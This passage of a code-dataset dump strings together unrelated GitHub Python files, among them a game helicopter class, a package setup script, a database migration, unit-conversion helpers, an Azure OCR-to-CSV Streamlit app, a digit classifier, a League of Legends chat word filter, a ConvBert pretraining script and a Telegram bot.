segment_query_info_list.sort(key=lambda x: x.alpha)\r\n if len(segment_query_info_list) == 0: return -1\r\n if almost_zero(segment_query_info_list[0].alpha): return 0\r\n return (segment_query_info_list[0].point - self.body.position).length\r\n\r\n def collision(self, other):\r\n if other.shape.collision_type == masks.CATEGORY_HUMANOID:\r\n if self.body.velocity.length > 15:\r\n if not other.dead:\r\n other.hurt(100)\r\n else:\r\n if not other.dead and self.rescued < self.capacity:\r\n other.destroyed = True\r\n self.rescued += 1\r\n self.snd.play()\r\n elif other.shape.collision_type == masks.CATEGORY_WALL:\r\n angle = utils.normalizeAngle(self.body.angle, 0.0)\r\n if abs(angle) > math.pi * 0.66:\r\n self.reset()\r\n\r\n def reset(self):\r\n self.body.position = self.spawn_point\r\n self.body.angle = 0\r\n self.hp = 10\r\n self.crash_snd.play()\r\n\r\n def hurt(self, damage):\r\n self.hp -= damage\r\n\r\n if self.hp <= 0:\r\n self.reset()\r\n","repo_name":"fathat/pyweek34","sub_path":"chopper.py","file_name":"chopper.py","file_ext":"py","file_size_in_byte":13132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42281103251","text":"from setuptools import setup, find_packages\nfrom os import path\n\n# Get the long description from the README file\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"pyepgnotify\",\n version=\"0.1.3\",\n license=\"GPLv3\",\n url=\"https://github.com/Aikhjarto/pyepgnotify.git\",\n download_url=\"https://github.com/Aikhjarto/pyepgnotify/archive/v0.1.3.tar.gz\",\n keywords=[\"VDR\", \"EPG\", \"mail\", \"notification\"],\n author=\"Thomas Wagner\",\n author_email=\"wagner-thomas@gmx.at\",\n description=\"Reads EPG data from VDR and sends user notification mails when desired programs are found\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n classifies=[\n \"Development Status :: 3 - Alpha\",\n \"Programming Language :: Python :: 3\",\n ],\n packages=find_packages(),\n python_requires=\">=3.5\",\n install_requires=[\"pyyaml\"],\n entry_points={\"console_scripts\": [\"pyepgnotify=pyepgnotify.epgnotify:main\"]},\n data_files=[(\"pyepgnotify\", [\"epgnotify.yml\"])],\n)\n","repo_name":"Aikhjarto/pyepgnotify","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73341833687","text":"\"\"\"Add attach_ical to RegistrationForm\n\nRevision ID: f26c201c8254\nRevises: 26985db8ed12\nCreate Date: 2021-02-15 10:52:15.353452\n\"\"\"\n\nimport sqlalchemy as sa\nfrom alembic import op\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f26c201c8254'\ndown_revision = '26985db8ed12'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('forms', sa.Column('attach_ical', sa.Boolean(), nullable=False,\n server_default='false'), schema='event_registration')\n op.alter_column('forms', 'attach_ical', server_default=None, schema='event_registration')\n\n\ndef downgrade():\n op.drop_column('forms', 'attach_ical', schema='event_registration')\n","repo_name":"indico/indico","sub_path":"indico/migrations/versions/20210215_1052_f26c201c8254_add_attach_ical_to_registrationform.py","file_name":"20210215_1052_f26c201c8254_add_attach_ical_to_registrationform.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1560,"dataset":"github-code","pt":"31"} +{"seq_id":"22575465127","text":"# Bài 2. (Ứng dụng cấu trúc dữ liệu tập hợp)\n# Một vector v được gọi là vector beautiful nếu một số trong v chỉ xuất hiện đúng một lần.\n# Cần xác định xem phải xóa ít nhất bao nhiêu phần tử trong v để v trở thành vector beautiful.\n\ndef minDeletionsToMakeBeautiful(vector):\n # Khởi tạo một từ điển để lưu trữ số lần xuất hiện của mỗi phần tử và một biến để đếm số lượng phần tử cần xóa.\n counts = {}\n deletions = 0\n\n # Duyệt qua từng phần tử trong vector.\n for number in vector:\n # Kiểm tra nếu phần tử đã xuất hiện trong từ điển counts (đã xuất hiện trước đó).\n if number in counts:\n # Nếu đã xuất hiện trước đó, tăng biến deletions lên 1 và đánh dấu rằng phải xóa một phần tử để biến vector thành beautiful.\n deletions += 1\n else:\n # Nếu phần tử chưa từng xuất hiện trước đó, thì đánh dấu nó trong từ điển counts.\n counts[number] = 1\n\n # Trả về giá trị của biến deletions, tức là số lượng phần tử cần xóa để biến vector thành beautiful.\n return deletions\n\n\nvector = [3, 4, 2, 2, 6, 6, 3, 7, 8]\ndeletions_needed = minDeletionsToMakeBeautiful(vector)\nprint(f\"Phải xóa ít nhất {deletions_needed} phần tử để biến vector thành beautiful.\")\n\n\n","repo_name":"haiknt2002/TTUD_TH1","sub_path":"Bai2.py","file_name":"Bai2.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5090118199","text":"# Imports\r\nfrom typing import Union\r\nfrom resources.metric_conversion_constants import (\r\n SYMBOLS,\r\n CONVERSION_TYPES,\r\n IMPERIAL_MASS_UNITS,\r\n METRIC_MASS_UNITS,\r\n IMPERIAL_VOLUME_UNITS,\r\n METRIC_VOLUME_UNITS,\r\n IMPERIAL_LENGTH_UNITS,\r\n METRIC_LENGTH_UNITS,\r\n TIME_UNITS,\r\n TEMPERATURE_UNITS,\r\n)\r\n\r\n\r\n# Function definitions\r\n\r\n\r\ndef _check_arg_validity(\r\n base_type: str, quantity: Union[int, float], start_unit: str, end_unit: str\r\n) -> dict:\r\n\r\n \"\"\"\r\n Checks user parameters to ensure they are valid for conversion.\r\n :param base_type: User provided base type for conversion, like length, mass, etc.\r\n :param quantity: Initial value to be converted.\r\n :param start_unit: Starting unit describing initial value provided by user.\r\n :param end_unit: target unit for initial value to be converted to from the starting unit.\r\n :return: A dictionary of flags indicating the validity of user arguments.\r\n \"\"\"\r\n # Initialization\r\n type_flags = {\r\n \"good_base\": False,\r\n \"good_quantity\": False,\r\n \"good_start_unit\": False,\r\n \"good_end_unit\": False,\r\n \"start_end_match\": False,\r\n }\r\n\r\n # Checks / Decisioning\r\n if base_type in CONVERSION_TYPES:\r\n type_flags[\"good_base\"] = True\r\n\r\n if isinstance(quantity, float):\r\n type_flags[\"good_quantity\"] = True\r\n print(type_flags)\r\n if (\r\n start_unit in IMPERIAL_MASS_UNITS\r\n or start_unit in METRIC_MASS_UNITS\r\n or start_unit in IMPERIAL_LENGTH_UNITS\r\n or start_unit in METRIC_LENGTH_UNITS\r\n or start_unit in IMPERIAL_VOLUME_UNITS\r\n or start_unit in METRIC_VOLUME_UNITS\r\n or start_unit in TIME_UNITS\r\n or start_unit in TEMPERATURE_UNITS\r\n ):\r\n type_flags[\"good_start_unit\"] = True\r\n\r\n if (\r\n end_unit in IMPERIAL_MASS_UNITS\r\n or end_unit in METRIC_MASS_UNITS\r\n or end_unit in IMPERIAL_LENGTH_UNITS\r\n or end_unit in METRIC_LENGTH_UNITS\r\n or end_unit in IMPERIAL_VOLUME_UNITS\r\n or end_unit in METRIC_VOLUME_UNITS\r\n or end_unit in TIME_UNITS\r\n or end_unit in TEMPERATURE_UNITS\r\n ):\r\n type_flags[\"good_end_unit\"] = True\r\n\r\n if type_flags[\"good_start_unit\"] and type_flags[\"good_end_unit\"]:\r\n if (\r\n start_unit in IMPERIAL_MASS_UNITS or start_unit in METRIC_MASS_UNITS\r\n ) and base_type == \"mass\":\r\n if (\r\n end_unit in IMPERIAL_MASS_UNITS or end_unit in METRIC_MASS_UNITS\r\n ) and base_type == \"mass\":\r\n type_flags[\"start_end_match\"] = True\r\n elif (\r\n start_unit in IMPERIAL_VOLUME_UNITS or start_unit in METRIC_VOLUME_UNITS\r\n ) and base_type == \"volume\":\r\n if (\r\n end_unit in IMPERIAL_MASS_UNITS or end_unit in METRIC_VOLUME_UNITS\r\n ) and base_type == \"volume\":\r\n type_flags[\"start_end_match\"] = True\r\n elif (\r\n start_unit in IMPERIAL_LENGTH_UNITS or start_unit in METRIC_LENGTH_UNITS\r\n ) and base_type == \"length\":\r\n if (\r\n end_unit in IMPERIAL_LENGTH_UNITS or end_unit in METRIC_LENGTH_UNITS\r\n ) and base_type == \"length\":\r\n type_flags[\"start_end_match\"] = True\r\n elif (\r\n start_unit in TIME_UNITS and end_unit in TIME_UNITS and base_type == \"time\"\r\n ):\r\n type_flags[\"start_end_match\"] = True\r\n elif (\r\n start_unit in TEMPERATURE_UNITS\r\n and end_unit in TEMPERATURE_UNITS\r\n and base_type == \"temperature\"\r\n ):\r\n type_flags[\"start_end_match\"] = True\r\n\r\n return type_flags\r\n\r\n\r\ndef _print_flag_errors(type_flags: dict) -> str:\r\n error = \"\"\r\n\r\n if not type_flags[\"good_base\"]:\r\n error += \"\\nInvalid `base_type` value.\"\r\n if not type_flags[\"good_quantity\"]:\r\n error += \"\\nInvalid `quantity` value.\"\r\n if not type_flags[\"good_start_unit\"]:\r\n error += \"\\nInvalid `start_unit`.\"\r\n if not type_flags[\"good_end_unit\"]:\r\n error += \"\\nInvalid `end_unit`.\"\r\n if not type_flags[\"start_end_match\"]:\r\n error += \"\\n`start_unit` and `end_unit` values don't match `base_type`.\"\r\n\r\n return error\r\n\r\n\r\ndef _print_result(\r\n start_quantity: Union[int, float],\r\n start_unit: str,\r\n end_unit: str,\r\n end_quantity: Union[int, float],\r\n) -> str:\r\n \"\"\"\r\n Function to create final output string for conversion.\r\n\r\n :param start_quantity: Integer or float starting quantity which needed conversion.\r\n :param start_unit: Initial unit type of integer or float starting quantity.\r\n :param end_unit: Ending unit type of integer or float quantity.\r\n :param end_quantity: Integer or float of converted starting quantity from start unit to end unit.\r\n :return: String of values concatenated in user friendly message.\r\n \"\"\"\r\n if end_quantity < 0.000001:\r\n output = \"Value smaller than decimal precision 6. Cannot output.\"\r\n else:\r\n output = f\"```{start_quantity} {start_unit} = {end_quantity} {end_unit}```\"\r\n return output\r\n\r\n\r\ndef _check_symbols(start_unit: str, end_unit: str) -> tuple:\r\n \"\"\"\r\n Checks if starting unit or ending unit are contained in the alias dictionary, SYMBOLS.\r\n :param start_unit: string indicating the starting unit type.\r\n :param end_unit: string indicating the ending unit type.\r\n :return: returns tuple of values post comparison/conversion with alias dictionary.\r\n \"\"\"\r\n if start_unit in SYMBOLS:\r\n start_unit = SYMBOLS[start_unit]\r\n if end_unit in SYMBOLS:\r\n end_unit = SYMBOLS[end_unit]\r\n\r\n return start_unit, end_unit\r\n\r\n\r\ndef _intermediate_helper(\r\n start_unit: str,\r\n end_unit: str,\r\n quantity: Union[int, float],\r\n imperial: dict,\r\n metric: dict,\r\n) -> Union[int, float]:\r\n\r\n \"\"\"\r\n Function turns any input quantity into an intermediate value based on dictionary constants. Function\r\n then takes the intermediate form and converts it to the target form.\r\n\r\n :param start_unit: Starting unit type of value input.\r\n :param end_unit: ending unit type of value input.\r\n :param quantity: Starting value to be converted.\r\n :param imperial: Imperial dictionary for related type conversion (length, volume, etc.).\r\n :param metric: Metric dictionary for related type conversion (length, volume, etc.).\r\n :return: Converted integer or float value of quantity from starting unit to ending unit.\r\n \"\"\"\r\n # Initialization\r\n final = 0\r\n intermediate_form = 0\r\n\r\n # Decisioning based on starting unit and ending unit.\r\n if start_unit in imperial:\r\n intermediate_form = quantity * imperial[start_unit]\r\n if end_unit in imperial:\r\n final = intermediate_form / imperial[end_unit]\r\n elif end_unit in metric:\r\n intermediate_form *= imperial[\"conversion\"]\r\n final = intermediate_form / metric[end_unit]\r\n\r\n elif start_unit in metric:\r\n intermediate_form = quantity * metric[start_unit]\r\n if end_unit in metric:\r\n final = intermediate_form / metric[end_unit]\r\n elif end_unit in imperial:\r\n intermediate_form *= metric[\"conversion\"]\r\n final = intermediate_form / imperial[end_unit]\r\n\r\n return final\r\n\r\n\r\ndef _convert_temp(\r\n start_unit: str, end_unit: str, quantity: Union[int, float]\r\n) -> Union[int, float]:\r\n\r\n \"\"\"\r\n Converts temperature between fahrenheit and celsius.\r\n :param start_unit: starting unit for conversion.\r\n :param end_unit: ending unit for quantity to be converted to.\r\n :param quantity: starting temperature to be converted.\r\n :return: quantity converted from starting unit to ending unit.\r\n \"\"\"\r\n temperature = 0\r\n if start_unit == \"fahrenheit\" and end_unit == \"celsius\":\r\n temperature = (quantity - 32) * (5 / 9) # (F - 32) * (5/9) = C\r\n elif start_unit == \"celsius\" and end_unit == \"fahrenheit\":\r\n temperature = (quantity * (9 / 5)) + 32 # (C * (9/5)) + 32 = F\r\n return temperature\r\n","repo_name":"sneks-sus/Novell","sub_path":"helpers/metric_conversion_helpers.py","file_name":"metric_conversion_helpers.py","file_ext":"py","file_size_in_byte":8091,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"32113538182","text":"from azure.core.credentials import AzureKeyCredential\nfrom azure.ai.formrecognizer import DocumentAnalysisClient\nfrom dotenv import load_dotenv\nimport io, os\nimport pandas as pd\nfrom PIL import Image\nimport streamlit as st\n\n\n# ---Environment---\nload_dotenv(verbose=True, dotenv_path='.env')\nKEY = os.environ.get(\"KEY\") # Or write your API KEY directly\nENDPOINT = os.environ.get(\"ENDPOINT\")\n\nst.title(\"手書きの表(画像) → CSV\")\nst.write(\"無料につき500枚/月まで。Created by 工藤\")\n\ndf_l = []\nPATH = \".\"\n\nuploaded_files = st.file_uploader(\"Upload files\", type=[\"jpg\", \"png\", \"tif\"], accept_multiple_files=True)\nif uploaded_files:\n for file in uploaded_files:\n img_path = os.path.join(PATH, file.name)\n with open(img_path, \"wb\") as f:\n f.write(file.read())\n img = Image.open(img_path)\n img = img.convert('RGB')\n\n img_byte_arr = io.BytesIO()\n img.save(img_byte_arr, format='JPEG')\n img_byte_arr = img_byte_arr.getvalue()\n \n document_analysis_client = DocumentAnalysisClient(endpoint=ENDPOINT, credential=AzureKeyCredential(KEY))\n poller = document_analysis_client.begin_analyze_document(\"prebuilt-layout\", img_byte_arr)\n response = poller.result()\n\n table_data = response.tables[0]\n df = pd.DataFrame(columns=list(range(table_data.column_count)), index=list(range(table_data.row_count)))\n for cell in table_data.cells:\n r, c, text = cell.row_index, cell.column_index, cell.content\n df.loc[r, c] = text\n # df = df[1:]\n\n df_l.append(df)\n os.remove(img_path)\n\nif df_l != []:\n df = pd.concat(df_l)\n\n st.write(\"プレビュー\")\n col1, col2 = st.columns(2)\n with col1:\n st.header(\"Uploaded file\")\n st.image(uploaded_files[0])\n with col2:\n st.header(\"Results\")\n st.dataframe(df.head(10))\n\n st.header(\"Download Here!\")\n # csvファイルをダウンロードするためのUIを作成\n csv = df.to_csv(header=False, index=False).encode('shift-jis', 'replace')\n if st.download_button(label='Download CSV', data=csv, file_name=\"data.csv\", mime='text/csv'):\n st.write(\"Thank you!\")\n df_l = []","repo_name":"Takahiro910/text_ocr","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2889329758","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import load_digits\nfrom sklearn.metrics import accuracy_score\nimport torchvision\n\n\nclass DigitDataset(Dataset):\n def __init__(self, data, targets):\n self.data = data\n self.targets = targets\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, item):\n return self.data[item], self.targets[item]\n\nclass LinearNetwork(nn.Module):\n \n def __init__(self, input_size, output_size):\n super().__init__()\n self.fc1 = nn.Linear(input_size, 128)\n self.fc2 = nn.Linear(128, 256)\n self.fc3 = nn.Linear(256, output_size)\n self.loss = F.mse_loss\n \n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.relu(x)\n x = self.fc3(x)\n\n return x \n\ndata = load_digits()\nx = data[\"data\"]\ny = data[\"target\"]\nY = np.zeros((len(y), 10))\nindices = np.arange(len(y))\n\nY[indices, y] = 1\nbatch_size = 64\nX_train, X_test, Y_train, Y_test = train_test_split(x,Y,train_size=0.7)\ntrain_dataset = DigitDataset(data=X_train, targets=Y_train)\ntrain_dataloader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\ntest_dataset = DigitDataset(data=X_test, targets=Y_test)\ntest_dataloader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=True)\n\nlin_net = LinearNetwork(input_size = 64, output_size = 10)\noptimizer = optim.Adam(params=lin_net.parameters(),lr=0.001)\nepochs = 10\n\nfor epoch in range(epochs):\n if epoch % 1 == 0:\n lin_net.eval()\n correct = 0\n \n for x,y in test_dataloader:\n x = x.to(torch.float)\n y = y.to(torch.float)\n y_hat = lin_net(x)\n y_hat = torch.squeeze(y_hat,dim=1)\n choices = torch.argmax(y_hat,dim=1)\n indices = np.arange(len(x))\n y_hat = torch.zeros_like(y_hat)\n y_hat[indices,choices] = 1\n score = accuracy_score(y_hat,y)\n correct += score*len(x)\n \n print(correct/len(test_dataset))\n lin_net.train()\n\n for x, y in train_dataloader:\n x = x.to(torch.float)\n y = y.to(torch.float)\n #zero out the gradients\n \n optimizer.zero_grad()\n y_hat = lin_net(x)\n y_hat = torch.squeeze(y_hat,dim=1)\n loss = lin_net.loss(y_hat,y)\n \n\n loss.backward()\n optimizer.step()\n ","repo_name":"kerby2002/python-study-prgramming","sub_path":"digit_classifier.py","file_name":"digit_classifier.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41672237805","text":"##James Cathey 2020##\n##Gauss_USV##\n#Movement.py\n#Start of a file to do some movement and distance calculations for GAUSS\n\n\nimport math as Math\nfrom time import sleep\n\n#SmallTargetRadius = 15 #target radius sizes in meters\n#LargeTargetRadius = 100\n\n\n\ndef getGoalDistance(gLat,gLong,targetLat,targetLong):\n R = 6378.137 # Radius of earth in KM\n dLat = targetLat * Math.pi / 180 - gLat * Math.pi / 180\n dLon = targetLong * Math.pi / 180 - gLong * Math.pi / 180\n a = Math.sin(dLat/2) * Math.sin(dLat/2) + Math.cos(gLat * Math.pi / 180) * Math.cos(targetLat * Math.pi / 180) * Math.sin(dLon/2) * Math.sin(dLon/2)\n c = 2 * Math.atan2(Math.sqrt(a), Math.sqrt(1-a))\n d = R * c\n distance = d*1000 #distance from target to Gauss in meters\n return distance\n\n\ndef inRadius(dist, targetRadius):\n if dist < targetRadius:\n return True\n else :\n return False\n\ndef getGoalHeading(gaussLat, gaussLong, targetLat, targetLong):\n X = Math.cos(targetLat) * Math.sin(targetLong-gaussLong)\n Y = Math.cos(gaussLat)*Math.sin(targetLat) - Math.sin(gaussLat) * Math.cos(targetLat)*Math.cos(targetLong-gaussLong)\n radHeading = Math.atan2(X,Y)\n goalDegrees = radHeading*180/Math.pi\n return goalDegrees\n\n##Testing functions\n\n#dist = getGoalDistance(47.262114, -122.438085, 47.262118, -122.437940)\n#print('Distance from goal = ', dist , 'Meters');\n\n#done = inRadius(dist, 30);\n#print('Gauss is in the radius', done)\n\n","repo_name":"jamesssf/GAUSS-USV","sub_path":"DistancetoGoal.py","file_name":"DistancetoGoal.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5201680490","text":"import keyboard\nfrom pynput import mouse\n\nfile_path = 'ban_words.txt' \n\nwith open(file_path, 'r') as file:\n content = file.read()\n flaggedWords = content.split()\n\nflagged_words_lower = [word.lower() for word in flaggedWords]\n\nstring = ''\nstartTyping = False\n\ndef on_key_press(event):\n global flaggedWords\n global string\n global startTyping\n \n if event.name == 'space':\n if startTyping:\n\n words_to_check = string.lower().split()\n\n flagged = False\n for word in words_to_check:\n if word in flagged_words_lower:\n print(f\"Rec {word} je flegovana\")\n\n words_to_check.remove(word)\n string = ' '.join(words_to_check)\n string += ' '\n\n for i in range(len(word)+1):\n keyboard.send('backspace')\n\n flagged = True\n if flagged == False:\n string += ' '\n elif event.name == 'enter':\n if startTyping:\n print(f\"Key Pressed: {string} with the length of {len(string)}\")\n startTyping = False\n string = ''\n else:\n startTyping = True\n string = ''\n elif event.name == 'esc':\n startTyping = False\n string = ''\n else:\n if startTyping:\n if len(event.name) == 1:\n string += event.name\n\n words_to_check = string.lower().split()\n\n for word in words_to_check:\n if word in flagged_words_lower:\n\n words_to_check.remove(word)\n\n string = ' '.join(words_to_check)\n string += ' '\n\n for i in range(len(word)):\n keyboard.send('backspace')\n\n if len(string) == 1:\n string = string[:-1]\n\n\n elif event.name == 'backspace':\n if len(string) > 0:\n string = string[:-1]\n\ndef on_mouse_click(x, y, button, pressed):\n global startTyping\n global string\n\n\n if button == button.left and not pressed and startTyping == True:\n print(f\"X pos is {x}, Y pos is {y}\")\n #Positions of the chatBox\n if (x < 1042 or x > 1478) or (y < 929 or y > 968):\n keyboard.send('esc')\n startTyping = False\n string = ''\n print(f\"Kliknuo si van polja za cet pa ga gasim\")\n\n\n\nimport threading\nimport time\nimport psutil\nimport win32gui\n\ndef is_process_running(process_name):\n for proc in psutil.process_iter(['name']):\n if proc.info['name'] == process_name:\n return True\n return False\n\ndef is_app_selected(window_title):\n hwnd = win32gui.GetForegroundWindow()\n selected_window_title = win32gui.GetWindowText(hwnd)\n return selected_window_title == window_title\n\n\n\n# Dovde je logika iza chat filtera i za proveru da li radi funkcije\n\n###################################################################\n\n# Odavde krece pokretanje programa i threading\n\ndef task(exit_flag):\n global startTyping\n global string\n\n\n stop_thread2 = threading.Event() # Event used to signal thread2 to stop\n\n def another_task():\n global startTyping\n global string\n\n while not stop_thread2.is_set():\n\n\n startTyping = False\n string = ''\n\n keyboard.on_press(on_key_press)\n\n\n mouse_listener = mouse.Listener(on_click=on_mouse_click)\n\n mouse_listener.start()\n\n while not stop_thread2.is_set():\n time.sleep(0.1) # Adjust the sleep duration as needed\n\n keyboard.unhook_all()\n\n mouse_listener.stop()\n\n\n\n thread2 = None\n\n\n while not exit_flag.is_set(): # TODO button za menjanje promenljive\n # Checks if you're in a game\n process_name = \"League of Legends.exe\"\n if is_process_running(process_name):\n app_title = \"League of Legends (TM) Client\" \n if is_app_selected(app_title):\n if thread2 is None or not thread2.is_alive():\n thread2 = threading.Thread(target=another_task)\n stop_thread2.clear()\n thread2.start()\n else:\n if thread2 is not None and thread2.is_alive():\n stop_thread2.set() # Signal thread2 to stop\n thread2.join()\n thread2 = None\n\n time.sleep(2.5) \n\n # Check for an exit condition\n if stop_thread2.is_set():\n if thread2 is not None and thread2.is_alive():\n stop_thread2.set() # Signal thread2 to stop\n thread2.join()\n\n\n\n###################################################################\n\n# Create the exit flag as a shared variable\nexit_flag = threading.Event()\n\n# Create and start the first thread\nthread = threading.Thread(target=task, args=(exit_flag,))\nthread.start()\n\n\n# ovde cemo staviti na klik dugmeta\n# Wait for the termination signal (e.g., Ctrl+C)\ntry:\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n print(\"KeyboardInterrupt: Stopping the program.\")\n exit_flag.set()\n # stop_thread2.set()\n\nthread.join()\n\nprint(\"Program ended.\")\n\n","repo_name":"FilipJovanovic10020rn/League-of-Legends-Chat-Filter","sub_path":"FuncionalityForProgramFinished.py","file_name":"FuncionalityForProgramFinished.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25537179420","text":"\"\"\"\n@Time : 2020-11-26 17:03:29\n@File : run_pretraining.py\n@Author : Abtion\n@Email : abtion{at}outlook.com\n\"\"\"\n\nfrom sklearn.model_selection import train_test_split\nimport os\n\nfrom tqdm import tqdm\n\nfrom simpletransformers.language_modeling import LanguageModelingModel\nimport logging\n\n\ndef proc_data():\n import json\n all_text = []\n data_path = '/ml/nlp/data'\n # for fn in os.listdir(data_path):\n # if os.path.isdir(os.path.join(data_path, fn)):\n # for txt_name in tqdm(os.listdir(os.path.join(data_path, fn))):\n # txt_path = os.path.join(data_path, fn, txt_name)\n # if txt_path.endswith('.txt'):\n # with open(txt_path, 'r', encoding='utf8') as f:\n # for line in f:\n # line = line.strip()\n # if len(line) > 1:\n # all_text.append(line)\n data_path = '/ml/nlp/data/wiki'\n for txt_name in tqdm(os.listdir(data_path)):\n txt_path = os.path.join(data_path, txt_name)\n if txt_path.endswith('.txt'):\n with open(txt_path, 'r', encoding='utf8') as f:\n for line in f:\n line = line.strip()\n if len(line) > 1:\n all_text.append(line)\n\n with open('data/data.json', 'r', encoding='utf8') as f:\n data = json.load(f)\n for d in data:\n all_text.append(d['Title'])\n all_text.append(d['Content'])\n\n train, test = train_test_split(all_text, test_size=0.1)\n\n with open(\"data/train.txt\", \"w\") as f:\n for line in train:\n f.write(line + \"\\n\")\n\n with open(\"data/test.txt\", \"w\") as f:\n for line in test:\n f.write(line + \"\\n\")\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n transformers_logger = logging.getLogger(\"transformers\")\n transformers_logger.setLevel(logging.WARNING)\n\n train_args = {\n \"reprocess_input_data\": False,\n \"overwrite_output_dir\": True,\n \"num_train_epochs\": 50,\n \"save_eval_checkpoints\": True,\n \"save_model_every_epoch\": False,\n \"learning_rate\": 1e-3,\n \"warmup_steps\": 10000,\n \"train_batch_size\": 64,\n \"eval_batch_size\": 128,\n \"gradient_accumulation_steps\": 2,\n \"block_size\": 128,\n \"max_seq_length\": 128,\n \"dataset_type\": \"simple\",\n \"wandb_project\": \"Esperanto - ConvBert\",\n \"wandb_kwargs\": {\"name\": \"ConvBert-SMALL\"},\n \"logging_steps\": 100,\n \"evaluate_during_training\": True,\n \"evaluate_during_training_steps\": 3000,\n \"evaluate_during_training_verbose\": True,\n \"use_cached_eval_features\": True,\n \"sliding_window\": False,\n \"tokenizer_name\": \"bert-base-chinese\",\n \"use_multiprocessing\": True,\n \"process_count\": 8,\n \"vocab_size\": 21128,\n \"generator_config\": {\n \"attention_probs_dropout_prob\": 0.1,\n \"directionality\": \"bidi\",\n \"embedding_size\": 128,\n \"hidden_act\": \"gelu\",\n \"hidden_dropout_prob\": 0.1,\n \"hidden_size\": 64,\n \"initializer_range\": 0.02,\n \"intermediate_size\": 256,\n \"layer_norm_eps\": 1e-12,\n \"max_position_embeddings\": 512,\n \"model_type\": \"convbert\",\n \"num_attention_heads\": 1,\n \"num_hidden_layers\": 12,\n \"pad_token_id\": 0,\n \"summary_activation\": \"gelu\",\n \"summary_last_dropout\": 0.1,\n \"summary_type\": \"first\",\n \"summary_use_proj\": True,\n \"type_vocab_size\": 2,\n \"vocab_size\": 21128\n },\n \"discriminator_config\": {\n \"attention_probs_dropout_prob\": 0.1,\n \"embedding_size\": 128,\n \"hidden_act\": \"gelu\",\n \"hidden_dropout_prob\": 0.1,\n \"hidden_size\": 256,\n \"initializer_range\": 0.02,\n \"intermediate_size\": 1024,\n \"layer_norm_eps\": 1e-12,\n \"max_position_embeddings\": 512,\n \"model_type\": \"convbert\",\n \"num_attention_heads\": 4,\n \"num_hidden_layers\": 12,\n \"output_past\": True,\n \"pad_token_id\": 0,\n \"summary_activation\": \"gelu\",\n \"summary_last_dropout\": 0.1,\n \"summary_type\": \"first\",\n \"summary_use_proj\": True,\n \"type_vocab_size\": 2,\n \"vocab_size\": 21128\n },\n }\n\n train_file = \"data/train.txt\"\n test_file = \"data/test.txt\"\n\n model = LanguageModelingModel(\n \"convbert\",\n None,\n args=train_args,\n train_files=train_file,\n cuda_device=1,\n )\n\n model.train_model(\n train_file, eval_file=test_file,\n )\n\n model.eval_model(test_file)\n\n\ndef save_best_model():\n model = LanguageModelingModel(\n 'convbert',\n 'outputs/best_model',\n args={\"output_dir\": \"discriminator_trained\"}\n )\n model.save_discriminator()\n\n\nif __name__ == '__main__':\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n # proc_data()\n main()\n # save_best_model()\n","repo_name":"gitabtion/ConvBert-PyTorch","sub_path":"run_language_modeling.py","file_name":"run_language_modeling.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"31"} +{"seq_id":"35738062921","text":"\nimport telepot\nimport time\nimport urllib3\nimport Bot\nfrom config import *\n\nproxy_url = \"http://proxy.server:3128\"\n# telepot.api._pools = {\n# 'default': urllib3.ProxyManager(proxy_url=proxy_url, num_pools=3, maxsize=10, retries=False, timeout=30),\n# }\ntelepot.api._onetime_pool_spec = (urllib3.ProxyManager, dict(proxy_url=proxy_url, num_pools=1, maxsize=1, retries=False, timeout=30))\n\nbot = telepot.Bot(BOT_TOKEN)\nprevText = {}\nprevReply = {}\npeople = []\n\n\ndef handle(msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n print(content_type, chat_type, chat_id)\n\n if content_type == 'text':\n if chat_id not in people:\n bot.sendMessage(chat_id, \"Hello! You seem to be a new face, allow me to introduce myself. I am anokhaBot I'm an \\\n artificial agent that can tell you anything about Anokha. I'm still learning a lot about \\\n anokha so it would be very helpful if you type /wrong whenever I go wrong somewhere and I promise to get better next time.\")\n people.append(chat_id)\n if msg[\"text\"] == \"/wrong\":\n with open(\"errors.txt\", \"a\") as file:\n writeData = \"cid-\" + str(chat_id) + \"-txt-\" + str(prevText[chat_id]) + \"-rep-\" + str(prevReply[chat_id]) + \"\\n\"\n file.write(writeData)\n return\n reply = Bot.response(msg[\"text\"])\n prevText[chat_id] = msg[\"text\"]\n prevReply[chat_id] = 